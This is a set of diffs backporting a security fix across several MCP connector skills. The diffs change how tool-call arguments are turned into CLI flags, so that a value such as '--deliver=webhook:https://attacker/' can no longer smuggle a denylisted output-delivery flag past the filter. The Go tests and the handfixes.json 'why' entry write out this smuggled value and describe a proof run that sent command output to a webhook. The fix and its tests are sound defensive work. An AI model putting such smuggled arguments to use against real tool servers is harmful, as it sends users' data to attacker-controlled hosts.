+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/cipp/handfixes.json
+++ b/skills/cipp/handfixes.json
@@ -502,6 +502,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/cipp/handfixes.json
+++ b/skills/cipp/handfixes.json
@@ -517,8 +517,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -528,7 +540,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/connectwise-automate/CHANGELOG.md
+++ b/skills/connectwise-automate/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/connectwise-automate/CHANGELOG.md
+++ b/skills/connectwise-automate/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/connectwise-automate/CHANGELOG.md
+++ b/skills/connectwise-automate/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/connectwise-automate/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/connectwise-automate/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/connectwise-automate/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/connectwise-automate/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/connectwise-automate/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/connectwise-automate/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/connectwise-automate/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/connectwise-automate/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/connectwise-automate/handfixes.json
+++ b/skills/connectwise-automate/handfixes.json
@@ -266,8 +266,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -277,7 +289,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/connectwise-automate/handfixes.json
+++ b/skills/connectwise-automate/handfixes.json
@@ -251,6 +251,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/connectwise-control/CHANGELOG.md
+++ b/skills/connectwise-control/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-08-26
 

--- a/skills/connectwise-control/CHANGELOG.md
+++ b/skills/connectwise-control/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-08-26
 
 ### Fixed

--- a/skills/connectwise-control/CHANGELOG.md
+++ b/skills/connectwise-control/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-08-26

--- a/skills/connectwise-control/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/connectwise-control/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/connectwise-control/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/connectwise-control/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/connectwise-control/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/connectwise-control/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/connectwise-control/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/connectwise-control/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/connectwise-control/handfixes.json
+++ b/skills/connectwise-control/handfixes.json
@@ -305,8 +305,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
